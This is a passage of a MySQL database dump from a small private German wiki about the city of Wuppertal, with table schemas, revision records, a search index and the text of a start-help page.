ENGINE=InnoDB AUTO_INCREMENT=14 DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `recentchanges` -- LOCK TABLES `recentchanges` WRITE; /*!40000 ALTER TABLE `recentchanges` DISABLE KEYS */; INSERT INTO `recentchanges` VALUES (1,'20150429051156',1,'Wikiadmin',2,'Wikiadmin','Die Seite wurde neu angelegt: „Admin des WuppertalWikis.“',0,0,1,1,1,0,1,'mw.new',0,'195.128.43.120',0,25,0,0,NULL,'',''),(2,'20150429054554',1,'Wikiadmin',4,'Über_WuppertalWiki','Die Seite wurde neu angelegt: „Das WuppertalWiki bietet Informationen über die Stadt Wuppertal von Usern für User, es wird privat betrieben und steht in keiner Verbindung zur Stadtverwaltung.“',0,0,1,2,2,0,1,'mw.new',0,'195.128.43.120',0,162,0,0,NULL,'',''),(3,'20150429193231',1,'Wikiadmin',0,'Hauptseite','Die Seite wurde neu angelegt: „

                                                                == Willkommen bemi WuppertalWiki ==
                                                                WupperWi…“',0,0,1,3,3,0,1,'mw.new',0,'5.146.236.11',0,2814,0,0,NULL,'',''),(4,'20150429193255',1,'Wikiadmin',0,'Hauptseite','/* Willkommen bemi WuppertalWiki */',0,0,0,3,4,3,0,'mw.edit',0,'5.146.236.11',2814,2815,0,0,NULL,'',''),(5,'20150429193332',1,'Wikiadmin',0,'Hauptseite','/* Willkommen beim WuppertalWiki */',0,0,0,3,5,4,0,'mw.edit',0,'5.146.236.11',2815,2824,0,0,NULL,'',''),(6,'20150429193432',1,'Wikiadmin',0,'Hauptseite','/* Willkommen beim WuppertalWiki */',0,0,0,3,6,5,0,'mw.edit',0,'5.146.236.11',2824,2802,0,0,NULL,'',''),(7,'20150429193909',1,'Wikiadmin',10,'FormatZahlLokal','Die Seite wurde neu angelegt: „ {{Dokumentation}} {{#switch: {{int:Lang}} | de-ch = {{FormatZahl|{{{1}}}|LAND=CH}} | #default = {{FormatZahl…“',0,0,1,4,7,0,1,'mw.new',0,'5.146.236.11',0,197,0,0,NULL,'',''),(8,'20150429194031',1,'Wikiadmin',0,'Hauptseite','',0,0,0,3,8,6,0,'mw.edit',0,'5.146.236.11',2802,2174,0,0,NULL,'',''),(9,'20150429194129',1,'Wikiadmin',10,'FormatZahl','Die Seite wurde neu angelegt: „{{#iferror: {{#expr: 1*{{{1}}} }} | {{{1}}} | {{#ifexpr: {{{1}}} < -0.004999999 | - }}{{#switch: {{uc:{{{LAND}}}}}…“',0,0,1,5,9,0,1,'mw.new',0,'5.146.236.11',0,2331,0,0,NULL,'',''),(10,'20150429194936',1,'Wikiadmin',0,'WupperWiki:Starthilfe','Die Seite wurde neu angelegt: „{{Shortcut}} {{Subpage|[[Wikipedia:Autorenportal|Autorenportal]]}} __NOTOC__ __NOEDITSECTION__ Die \'\'\'Starthilf…“',0,0,1,6,10,0,1,'mw.new',0,'5.146.236.11',0,10289,0,0,NULL,'',''),(11,'20150430072550',1,'Wikiadmin',0,'Hauptseite','/* Willkommen beim WuppertalWiki */',0,0,0,3,11,8,0,'mw.edit',0,'195.128.40.90',2174,76,0,0,NULL,'',''),(12,'20150430093310',1,'Wikiadmin',4,'Über_WuppertalWiki','',0,0,0,2,12,2,0,'mw.edit',0,'195.128.40.90',162,203,0,0,NULL,'',''),(13,'20150430142946',1,'Wikiadmin',4,'Über_WuppertalWiki','',0,0,0,2,13,12,0,'mw.edit',0,'194.99.144.7',203,474,0,0,NULL,'',''); /*!40000 ALTER TABLE `recentchanges` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `redirect` -- DROP TABLE IF EXISTS `redirect`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `redirect` ( `rd_from` int(10) unsigned NOT NULL DEFAULT '0', `rd_namespace` int(11) NOT NULL DEFAULT '0', `rd_title` varbinary(255) NOT NULL DEFAULT '', `rd_interwiki` varbinary(32) DEFAULT NULL, `rd_fragment` varbinary(255) DEFAULT NULL, PRIMARY KEY (`rd_from`), KEY `rd_ns_title` (`rd_namespace`,`rd_title`,`rd_from`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `redirect` -- LOCK TABLES `redirect` WRITE; /*!40000 ALTER TABLE `redirect` DISABLE KEYS */; /*!40000 ALTER TABLE `redirect` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `revision` -- DROP TABLE IF EXISTS `revision`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `revision` ( `rev_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `rev_page` int(10) unsigned NOT NULL, `rev_text_id` int(10) unsigned NOT NULL, `rev_comment` tinyblob NOT NULL, `rev_user` int(10) unsigned NOT NULL DEFAULT '0', `rev_user_text` varbinary(255) NOT NULL DEFAULT '', `rev_timestamp` binary(14) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `rev_minor_edit` tinyint(3) unsigned NOT NULL DEFAULT '0', `rev_deleted` tinyint(3) unsigned NOT NULL DEFAULT '0', `rev_len` int(10) unsigned DEFAULT NULL, `rev_parent_id` int(10) unsigned DEFAULT NULL, `rev_sha1` varbinary(32) NOT NULL DEFAULT '', `rev_content_model` varbinary(32) DEFAULT NULL, `rev_content_format` varbinary(64) DEFAULT NULL, PRIMARY KEY (`rev_id`), UNIQUE KEY `rev_page_id` (`rev_page`,`rev_id`), KEY `rev_timestamp` (`rev_timestamp`), KEY `page_timestamp` (`rev_page`,`rev_timestamp`), KEY `user_timestamp` (`rev_user`,`rev_timestamp`), KEY `usertext_timestamp` (`rev_user_text`,`rev_timestamp`), KEY `page_user_timestamp` (`rev_page`,`rev_user`,`rev_timestamp`) ) ENGINE=InnoDB AUTO_INCREMENT=14 DEFAULT CHARSET=binary MAX_ROWS=10000000 AVG_ROW_LENGTH=1024; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `revision` -- LOCK TABLES `revision` WRITE; /*!40000 ALTER TABLE `revision` DISABLE KEYS */; INSERT INTO `revision` VALUES (1,1,1,'Die Seite wurde neu angelegt: „Admin des WuppertalWikis.“',1,'Wikiadmin','20150429051156',0,0,25,0,'200cicesrabgqzdzrjilzc86dw9sfvt',NULL,NULL),(2,2,2,'Die Seite wurde neu angelegt: „Das WuppertalWiki bietet Informationen über die Stadt Wuppertal von Usern für User, es wird privat betrieben und steht in keiner Verbindung zur Stadtverwaltung.“',1,'Wikiadmin','20150429054554',0,0,162,0,'0jjuf5jfyh0mszufjvh2g1poiwmrezs',NULL,NULL),(3,3,3,'Die Seite wurde neu angelegt: „
                                                                == Willkommen bemi WuppertalWiki ==
                                                                WupperWi…“',1,'Wikiadmin','20150429193231',0,0,2814,0,'ff0q6mjiqyxpchbb0xsotfh476w2uql',NULL,NULL),(4,3,4,'/* Willkommen bemi WuppertalWiki */',1,'Wikiadmin','20150429193255',0,0,2815,3,'l7lpcehngyaxmvnj0liurea4i0k8b1o',NULL,NULL),(5,3,5,'/* Willkommen beim WuppertalWiki */',1,'Wikiadmin','20150429193332',0,0,2824,4,'e1rmokls48spn97j290dkht62sg4krf',NULL,NULL),(6,3,6,'/* Willkommen beim WuppertalWiki */',1,'Wikiadmin','20150429193432',0,0,2802,5,'ocyr72wltc7zqjuzkai54ju3birek5p',NULL,NULL),(7,4,7,'Die Seite wurde neu angelegt: „ {{Dokumentation}} {{#switch: {{int:Lang}} | de-ch = {{FormatZahl|{{{1}}}|LAND=CH}} | #default = {{FormatZahl…“',1,'Wikiadmin','20150429193909',0,0,197,0,'ke9bfngkjj84nq63g2fe29pbdxyd2hc',NULL,NULL),(8,3,8,'',1,'Wikiadmin','20150429194031',0,0,2174,6,'njf4685vtb00x53ej29zc47yj7rmq8r',NULL,NULL),(9,5,9,'Die Seite wurde neu angelegt: „{{#iferror: {{#expr: 1*{{{1}}} }} | {{{1}}} | {{#ifexpr: {{{1}}} < -0.004999999 | - }}{{#switch: {{uc:{{{LAND}}}}}…“',1,'Wikiadmin','20150429194129',0,0,2331,0,'adpgi8omub4jbuqm1jmx9bsz1oes125',NULL,NULL),(10,6,10,'Die Seite wurde neu angelegt: „{{Shortcut}} {{Subpage|[[Wikipedia:Autorenportal|Autorenportal]]}} __NOTOC__ __NOEDITSECTION__ Die \'\'\'Starthilf…“',1,'Wikiadmin','20150429194936',0,0,10289,0,'8mxvng00qwxijqm4nw3e32c2xdmtwvn',NULL,NULL),(11,3,11,'/* Willkommen beim WuppertalWiki */',1,'Wikiadmin','20150430072550',0,0,76,8,'lqhlid0iygurcq2aljzxflmtr6exc93',NULL,NULL),(12,2,12,'',1,'Wikiadmin','20150430093310',0,0,203,2,'c44tr97k4w9ov8zdn8pfnoy8skwxca8',NULL,NULL),(13,2,13,'',1,'Wikiadmin','20150430142946',0,0,474,12,'rg6cwymea24vk3848cppbcb02mrma72',NULL,NULL); /*!40000 ALTER TABLE `revision` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `searchindex` -- DROP TABLE IF EXISTS `searchindex`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `searchindex` ( `si_page` int(10) unsigned NOT NULL, `si_title` varchar(255) NOT NULL DEFAULT '', `si_text` mediumtext NOT NULL, UNIQUE KEY `si_page` (`si_page`), FULLTEXT KEY `si_title` (`si_title`), FULLTEXT KEY `si_text` (`si_text`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `searchindex` -- LOCK TABLES `searchindex` WRITE; /*!40000 ALTER TABLE `searchindex` DISABLE KEYS */; INSERT INTO `searchindex` VALUES (1,'wikiadmin',' admin desu800 wuppertalwikis. '),(2,'u8c3bcber wuppertalwiki',' dasu800 wuppertalwiki sammelt ehrenamtlich informationen u8c3bcber dieu800 kreisfreie stadt wuppertal. esu800 befindet sich inu800 einem stu8c3a4ndigen fluss dau800 neue informationen dazukommen undu800 bestehende aktualisiert werden. jeder deru800 mu8c3b6chte darf hier mitmachen undu800 dasu800 wiki erweitern. bitte beachte beiu800 alen beitru8c3a4gen dass diese unter einer gemeinfreien lizenz stehen creative commons oder gplu800 hinweise aufu800 urherberechtsverletzung bitte anu800 einen deru800 admins melden wiru800 ku8c3bcmmern unsu800 darum. '),(3,'hauptseite',' -- willkommen -- '),(5,'formatzahl',' -- -- #iferror #expr 1u800 1u800 1u800 #ifexpr 1u800 -0u800u82e004999999 - -- -- #switch ucu800 land chu800 liu800 #ifexpr absu800 1u800 round 0u800 1000000000000 1u800\'000u800\'000u800\'000u800\'000u800 #ifexpr absu800 1u800 round 0u800 1000000000 #expr absu800 1u800 round 0u800 1000000000 modu800 1000 \' -- -- #ifexpr absu800 1u800 round 0u800 100000000 #expr absu800 1u800 round 0u800 100000000 modu800 10u800 -- -- #ifexpr absu800 1u800 round 0u800 10000000 #expr absu800 1u800 round 0u800 10000000 modu800 10u800 -- -- #ifexpr absu800 1u800 round 0u800 1000000 #expr absu800 1u800 round 0u800 1000000 modu800 10u800 \' -- -- #ifexpr absu800 1u800 round 0u800 100000 #expr absu800 1u800 round 0u800 100000 modu800 10u800 -- -- #ifexpr absu800 1u800 round 0u800 10000 #expr absu800 1u800 round 0u800 10000 modu800 10u800 -- -- #ifexpr absu800 1u800 round 0u800 1000 #expr absu800 1u800 round 0u800 1000 modu800 10u800 -- -- #ifexpr #ifeq ucu800 2u800 tu800 1u800 0u800 andu800 absu800 1u800 round 0u800 1000 oru800 absu800 1u800 round 0u800 10000 \' -- -- #ifexpr absu800 1u800 round 0u800 100u800 #expr absu800 1u800 round 0u800 100u800 modu800 10u800 -- -- #ifexpr absu800 1u800 round 0u800 10u800 #expr absu800 1u800 round 0u800 10u800 modu800 10u800 -- -- #expr absu800 1u800 round 0u800 modu800 10u800 #ifexpr absu800 1u800 10u800 #expr absu800 1u800 round 1u800 #expr absu800 1u800 round 2u800 #default #ifexpr absu800 1u800 round 0u800 10000 zahlenformat #expr absu800 1u800 round 0u800 #ifexpr absu800 1u800 round 0u800 1000 #ifeq ucu800 2u800 tu800 zahlenformat #expr absu800 1u800 round 0u800 #expr absu800 1u800 round 0u800 #ifexpr absu800 1u800 10u800 zahlenformat #expr absu800 1u800 round 1u800 zahlenformat #expr absu800 1u800 round 2u800 dokumentation '),(4,'formatzahllokal',' dokumentation -- -- #switch intu800 lang deu800-chu800 formatzahl 1u800 land chu800 #default formatzahl 1u800 land deu800 '),(6,'wupperwiki starthilfe',' shortcut subpage wikipedia autorenportal autorenportal __notoc__ __noeditsection__ -- einleitungstext -- dieu800 starthilfe soll denu800 einstieg inu800 dieu800 wikipedia erleichtern. sieu800 richtet sich anu800 alle dieu800 inu800 deru800 wikipedia nuru800 lesen mu8c3b6chten u8e28093 oder dieu800 beginnen sieu800 zuu800 veru8c3a4ndern undu800 zuu800 erweitern. ausu800 denu800 vielen hilfreichen seiten wurden hier einige speziell fu8c3bcr diese bereiche ausgewu8c3a4hlt. dieu800 u8c2a9 neben denu800 bildchen verweisen aufu800 dieu800 urheberrechte ihrer zeichner. class wikitable toptextcells style width 100u800 ; background #ffffff; --weiu8c39fer hintergrund fu8c3bcr dieu800 leerzellen -- - --erstes sixpack-- colspan 3u800 style background #cbf8cb; font-size 120u800 ; hilfen fu8c3bcr leser - zelle link wikipedia einstieg fu8c3bcr leser lizenz 0u800 bild right-pointing hand inu800 green circleu82esvgu800 name einstieg fu8c3bcr leser gruppe 1u800 kennwort leser text allgemeines zumu800 aufbau deru800 wikipedia undu800 deru800 einzelnen artikel sowie nu8c3bctzliche tipps dieu800 dasu800 auffinden deru800 gesuchten informationen vereinfachen. zelle link hilfe suche lizenz 0u800 bild system-searchu82esvgu800 name suchoptionen gruppe 1u800 kennwort suche text detaillierte erklu8c3a4rung deru800 mu8c3b6glichkeiten umu800 gezielt nach artikeln oder inhalten zuu800 bestimmten themen zuu800 suchen. zusu8c3a4tzlich werden weitere suchmu8c3b6glichkeiten innerhalb deru800 wikipedia aufgelistet. zelle link hu800 benutzerkonto anlegen lizenz 0u800 bild system-users-3u800u82esvgu800 name benutzerkonto anlegen gruppe 1u800 kennwort benutzerkonto text einu800 benutzerkonto bietet eine reihe vonu800 vorteilen wieu800 beispielsweise eine beobachtungsliste aufu800 deru800 dieu800 artikel aufgelistet werden ku8c3b6nnen dieu800 fu8c3bcr denu800 leser vonu800 besonderem interesse sind. eine anmeldung istu800 fu8c3bcr dieu800 nutzung deru800 wikipedia aber nicht grundsu8c3a4tzlich erforderlich. - zelle link wikipedia tour fu8c3bcr leser lizenz 0u800 bild text-xu800-generic-touru82esvgu800 name tour fu8c3bcr leser gruppe 1u800 kennwort tour text eine schritt-fu8c3bcr-schritt-einfu8c3bchrung inu800 dieu800 benutzung deru800 wikipedia alsu800 leser. sieu800 bietet allgemeine informationen u8c3bcber dieu800 wikipedia wieu800 manu800 inhalte suchen undu800 finden kann wieu800 dieu800 artikelqualitu8c3a4t gewu8c3a4hrleistet wird sowie weiterfu8c3bchrende links. zelle link wikipedia grundprinzipien lizenz 0u800 bild wiki cartau82esvgu800 name grundprinzipien zelle 5u800 gruppe 1u800 kennwort grundprinzipien text dieu800 wichtigsten grundregeln deru800 wikipedia dieu800 fu8c3bcr alle mitarbeiter alsu800 verbindlich gelten. sieu800 dienen demu800 ziel eine enzyklopu8c3a4die vonu800 bestmu8c3b6glicher qualitu8c3a4t inu800 einem gemeinschaftlichen projekt zuu800 schaffen. zelle link wikipedia wasu800 wikipedia nicht istu800 lizenz 0u800 bild nou800 wikipediau82esvgu800 name wasu800 wikipedia nicht istu800 zelle 6u800 gruppe 1u800 kennwort wwni text einige informationen werden bewusst nicht veru8c3b6ffentlicht denn wikipedia istu800 einu800 projekt zumu800 aufbau einer enzyklopu8c3a4die. hier sind dieu800 wichtigsten punkte aufgefu8c3bchrt dieu800 oftmals vonu800 lesern oder neuautoren missverstanden werden. - colspan 3u800 style height 2emu800; - --zweites sixpack-- colspan 3u800 style background #ffebad; font-size 120u800 ; dieu800 ersten bearbeitungen - zelle link hilfe seite bearbeiten lizenz 0u800 bild text-xu800-generic with pencilu82esvgu800 name artikel bearbeiten gruppe 2u800 kennwort bearbeiten text dieu800 seite erklu8c3a4rt wieu800 einu800 artikel bearbeitet werden kann undu800 gibt hinweise zuu800 denu800 einzelnen funktionen. sieu800 bietet zudem einen link aufu800 eine interaktive hilfe umu800 dieu800 arbeitsschritte zuu800 verdeutlichen. zelle link wikipedia beteiligen lizenz 0u800 bild correctu82esvgu800 name beteiligen gruppe 2u800 kennwort beteiligen text dieu800 seite gibt einen kurzen u8c3bcberblick wieu800 zuru800 verbesserung undu800 erweiterung beigetragen werden kann. wikipedia istu800 einu800 offenes projekt inu800 demu800 jeder mitarbeiten darf. esu800 gibt vielfu8c3a4ltige mu8c3b6glichkeiten sich hier aktiv zuu800 beteiligen. zelle link hilfe u8c3bcbersicht lizenz 0u800 bild hilfe style icon name technische bedienung gruppe 2u800 kennwort hilfe text dieu800 seite enthu8c3a4lt eine auswahl deru800 hilfeseiten zuru800 technik undu800 zuru800 formatierung sowie zuu800 weiteren informationen u8c3bcber wikipedia. zudem bietet sieu800 eine suchfunktion dieu800 aufu800 dieu800 hilfeseiten beschru8c3a4nkt istu800. - zelle link wikipedia tutorial lizenz 0u800 bild input-keyboard touru82esvgu800 name tour fu8c3bcr editoren gruppe 2u800 kennwort tutorial text eine schritt-fu8c3bcr-schritt-anleitung fu8c3bcr dieu800 wichtigsten grundlagen deru800 bearbeitung undu800 dieu800 mitarbeit. sieu800 klu8c3a4rt u8c3bcber wichtige richtlinien aufu800 beschreibt dieu800 anmeldung dieu800 bearbeitung undu800 hu8c3a4lt weiterfu8c3bchrende links bereit. zelle link wikipedia diskussionsseiten lizenz 0u800 bild internet-talk-erroru82esvgu800 name fehler melden gruppe 2u800 kennwort dsu800 text jeder artikel hatu800 eine eigene diskussionsseite aufu800 deru800 fehler angesprochen undu800 vorschlu8c3a4ge zuru800 verbesserung gemacht werden ku8c3b6nnen. dasu800 ziel istu800 eine kommunikation miteinander dieu800 zuru800 qualitu8c3a4t deru800 wikipedia alsu800 enzyklopu8c3a4die beitragen soll. zelle link wikipedia fragen vonu800 neulingen lizenz 0u800 bild internet-group-help-faqu800u82esvgu800 name fragen stellen gruppe 2u800 kennwort fvnu800 text hier ku8c3b6nnen fragen zuru800 mitarbeit gestellt werden dieu800 vonu800 erfahrenen wikipedianern gern beantwortet werden. dieu800 seite istu800 speziell aufu800 dieu800 fragen neuer leser undu800 autoren ausgerichtet. - colspan 3u800 style height 2emu800; - --drittes sixpack-- colspan 3u800 style background #ffc0b0; font-size 120u800 ; deru800 erste artikel - zelle link wikipedia artikel lizenz 0u800 bild text document with redu800 question marku82esvgu800 name grundlegendes gruppe 3u800 kennwort artikel text informationen daru8c3bcber wasu800 einen wikipedia-artikel ausmacht undu800 wasu800 beim anlegen oder ergu8c3a4nzen eines artikels hinsichtlich thematik inhalt form undu800 umfang beachtet werden sollte. zelle link wikipedia relevanzcheck lizenz 0u800 bild edit-check-sheetu82esvgu800 name relevanzcheck gruppe 3u800 kennwort rku800 text nicht jedes thema eignet sich fu8c3bcr einen artikel inu800 deru800 wikipedia. hier kann gepru8c3bcft werden obu800 einu800 vorschlag dieu800 relevanzkriterien erfu8c3bcllt. einu800 relevanzcheck istu800 unverbindlich undu800 basiert aufu800 deru800 einschu8c3a4tzung erfahrener mitautoren. zelle link hilfe neuen artikel anlegen lizenz 0u800 bild text-xu800-generic-applyu82esvgu800 name artikel erstellen gruppe 3u800 kennwort deau800 text technische hilfe zumu800 erstellen eines neuen artikels. bitte beachten inu800 deru800 wikipedia du8c3bcrfen nuru800 inhalte stehen dieu800 bereits nachpru8c3bcfbar veru8c3b6ffentlicht wurden undu800 alsu800 enzyklopu8c3a4disch relevant gelten. - zelle link wikipedia wieu800 schreibe ichu800 gute artikel bild xu800-office-documentu82esvgu800 name gute artikel lizenz 0u800 gruppe 3u800 kennwort wsiga text eine ausfu8c3bchrliche anleitung zumu800 schreiben undu800 gestalten eines guten wikipedia-artikels mitu800 informationen zuu800 denu800 grundsu8c3a4tzen deru800 artikleerstellung sowie zuru800 gliederung undu800 zuu800 stilistischen undu800 typographischen richtlinien. zelle link hilfe artikelentwurf lizenz 0u800 bild text-xu800-generic-attentionu82esvgu800 name entwurf erstellen gruppe 3u800 kennwort entwurf text umu800 ungestu8c3b6rt anu800 einem neuen artikel arbeiten zuu800 ku8c3b6nnen empfiehlt esu800 sich diesen zunu8c3a4chst alsu800 entwurf anzulegen undu800 zuu800 speichern. sou800 kann beispielsweise vorab vonu800 anderen wikipedianern eine ru8c3bcckmeldung erbeten werden. zelle link wikipedia wasu800 bedeutet einu800 lu8c3b6schantrag hilfe mein artikel u8e280a6 lizenz 0u800 bild edit-delete-2u800u82esvgu800 name artikellu8c3b6schungen gruppe 3u800 kennwort ldu800 text wasu800 tunu800 wenn deru800 eigene artikel plu8c3b6tzlich nicht mehr auffindbar istu800 zumu800 lu8c3b6schen vorgeschlagen oder mitu800 einem merkwu8c3bcrdigen hinweistext versehen wird - colspan 3u800 style height 2emu800; - --viertes sixpack-- colspan 3u800 style background #85baff; font-size 120u800 ; weitere informationen - zelle link wikipedia anfragen lizenz 0u800 bild vraagteken-2u800u82esvgu800 name anfragen stellen gruppe 4u800 kennwort afu800 text inu800 deru800 wikipedia gibt esu800 fu8c3bcr fast alle fragen erfahrene ansprechpartner. diese seite soll dabei helfen denu800 richtigen ortu800 fu8c3bcr dieu800 jeweilige anfrage zuu800 finden. zelle link wikipedia mentorenprogramm lizenz 0u800 bild wiki-mentor-iconu82esvgu800 name mentorenprogramm gruppe 4u800 kennwort mpu800 text aufu800 dieser seite kann einu800 mentor passend nach fachlichen themen ausgewu8c3a4hlt werden. einu800 fester ansprechpartner erleichtert oftmals denu800 einstieg inu800 dieu800 mitarbeit beiu800 deru800 wikipedia. zelle link hilfe glossar lizenz 0u800 bild book-glossar-coveru82esvgu800 name glossar gruppe 4u800 kennwort glossar text dasu800 glossar gibt eine u8c3bcbersicht u8c3bcber dieu800 speziellen abku8c3bcrzungen undu800 begriffe dieu800 nicht allgemein bekannt sind jedoch vonu800 erfahrenen wikipedianern oftu800 genutzt werden. - zelle link wikipedia wikiprojekt lizenz 1u800 bild crystal project package graphicsu82epngu800 name wikipedia-projekte gruppe 4u800 kennwort projekte text wikipedianer dieu800 anu800 einem bestimmten thema interessiert sind finden sich oftu800 inu800 fachspezifischen projekten zusammen. hier sind diese projekte nach thematik aufgelistet. zelle link wikipedia konflikte lizenz 0u800 bild broken conversation iconu82esvgu800 name konflikte lu8c3b6sen gruppe 4u800 kennwort konflikte text dieu800 mitarbeit beiu800 wikipedia lu8c3a4uft leider nicht immer ganz reibungslos abu800. hier gibt esu800 hilfe umu800 konflikte mitu800 anderen wikipedianern zuu800 lu8c3b6sen. wichtig istu800 esu800 stets freundlich undu800 sachlich zuu800 bleiben. zelle link hilfe index lizenz 0u800 bild system-index-searchu82esvgu800 name index gruppe 4u800 kennwort index text eine alphabetische liste deru800 seiten dieu800 beiu800 deru800 bearbeitung deru800 wikipedia hilfreich sein ku8c3b6nnen. hier finden sich seitentitel ausu800 allen bereichen. weitere hinweise aufu800 deru800 wikipedia spielwiese kannst duu800 dasu800 bearbeiten ausprobieren. wikipedia seiu800 mutig seiu800 mutig undu800 wikipedia seiu800 tapfer bleibe tapfer aber vergiss bitte nicht dass andere benutzer auch menschen sind. bleibe daher immer wikipedia wikiquette freundlich auch wenn duu800 dich einmal u8c3bcber andere u8c3a4rgerst. gibu800 beiu800 artikelbearbeitungen einen wikipedia belege beleg anu800 undu800 begru8c3bcnde deine bearbeitung kurz inu800 deru800 hilfe zusammenfassung undu800 quellen zusammenfassungszeile . sou800 ku8c3b6nnen andere benutzer deine u8c3a4nderung besser nachvollziehen. weitere einblicke bietet dieu800 seite wikipedia handbuch . kategorie wikipedia neuu800 beiu800 wikipedia starthilfe kategorie wikipedia hilfe starthilfe kategorie wikipedia ratschlu8c3a4ge starthilfe '); /*!40000 ALTER TABLE `searchindex` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `site_identifiers` -- DROP TABLE IF EXISTS `site_identifiers`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `site_identifiers` ( `si_site` int(10) unsigned NOT NULL, `si_type` varbinary(32) NOT NULL, `si_key` varbinary(32) NOT NULL, UNIQUE KEY `site_ids_type` (`si_type`,`si_key`), KEY `site_ids_site` (`si_site`), KEY `site_ids_key` (`si_key`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `site_identifiers` -- LOCK TABLES `site_identifiers` WRITE; /*!40000 ALTER TABLE `site_identifiers` DISABLE KEYS */; /*!40000 ALTER TABLE `site_identifiers` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `site_stats` -- DROP TABLE IF EXISTS `site_stats`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `site_stats` ( `ss_row_id` int(10) unsigned NOT NULL, `ss_total_views` bigint(20) unsigned DEFAULT '0', `ss_total_edits` bigint(20) unsigned DEFAULT '0', `ss_good_articles` bigint(20) unsigned DEFAULT '0', `ss_total_pages` bigint(20) DEFAULT '-1', `ss_users` bigint(20) DEFAULT '-1', `ss_active_users` bigint(20) DEFAULT '-1', `ss_images` int(11) DEFAULT '0', UNIQUE KEY `ss_row_id` (`ss_row_id`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `site_stats` -- LOCK TABLES `site_stats` WRITE; /*!40000 ALTER TABLE `site_stats` DISABLE KEYS */; INSERT INTO `site_stats` VALUES (1,153,13,1,6,1,1,0); /*!40000 ALTER TABLE `site_stats` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `sites` -- DROP TABLE IF EXISTS `sites`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `sites` ( `site_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `site_global_key` varbinary(32) NOT NULL, `site_type` varbinary(32) NOT NULL, `site_group` varbinary(32) NOT NULL, `site_source` varbinary(32) NOT NULL, `site_language` varbinary(32) NOT NULL, `site_protocol` varbinary(32) NOT NULL, `site_domain` varbinary(255) NOT NULL, `site_data` blob NOT NULL, `site_forward` tinyint(1) NOT NULL, `site_config` blob NOT NULL, PRIMARY KEY (`site_id`), UNIQUE KEY `sites_global_key` (`site_global_key`), KEY `sites_type` (`site_type`), KEY `sites_group` (`site_group`), KEY `sites_source` (`site_source`), KEY `sites_language` (`site_language`), KEY `sites_protocol` (`site_protocol`), KEY `sites_domain` (`site_domain`), KEY `sites_forward` (`site_forward`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `sites` -- LOCK TABLES `sites` WRITE; /*!40000 ALTER TABLE `sites` DISABLE KEYS */; /*!40000 ALTER TABLE `sites` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `tag_summary` -- DROP TABLE IF EXISTS `tag_summary`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `tag_summary` ( `ts_rc_id` int(11) DEFAULT NULL, `ts_log_id` int(11) DEFAULT NULL, `ts_rev_id` int(11) DEFAULT NULL, `ts_tags` blob NOT NULL, UNIQUE KEY `tag_summary_rc_id` (`ts_rc_id`), UNIQUE KEY `tag_summary_log_id` (`ts_log_id`), UNIQUE KEY `tag_summary_rev_id` (`ts_rev_id`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `tag_summary` -- LOCK TABLES `tag_summary` WRITE; /*!40000 ALTER TABLE `tag_summary` DISABLE KEYS */; /*!40000 ALTER TABLE `tag_summary` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `templatelinks` -- DROP TABLE IF EXISTS `templatelinks`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `templatelinks` ( `tl_from` int(10) unsigned NOT NULL DEFAULT '0', `tl_from_namespace` int(11) NOT NULL DEFAULT '0', `tl_namespace` int(11) NOT NULL DEFAULT '0', `tl_title` varbinary(255) NOT NULL DEFAULT '', UNIQUE KEY `tl_from` (`tl_from`,`tl_namespace`,`tl_title`), UNIQUE KEY `tl_namespace` (`tl_namespace`,`tl_title`,`tl_from`), KEY `tl_backlinks_namespace` (`tl_namespace`,`tl_title`,`tl_from_namespace`,`tl_from`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `templatelinks` -- LOCK TABLES `templatelinks` WRITE; /*!40000 ALTER TABLE `templatelinks` DISABLE KEYS */; INSERT INTO `templatelinks` VALUES (6,0,10,'/Zelle'),(4,10,10,'Dokumentation'),(5,10,10,'Dokumentation'),(6,0,10,'Shortcut'),(6,0,10,'Subpage'); /*!40000 ALTER TABLE `templatelinks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `text` -- DROP TABLE IF EXISTS `text`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `text` ( `old_id` int(10) unsigned NOT NULL 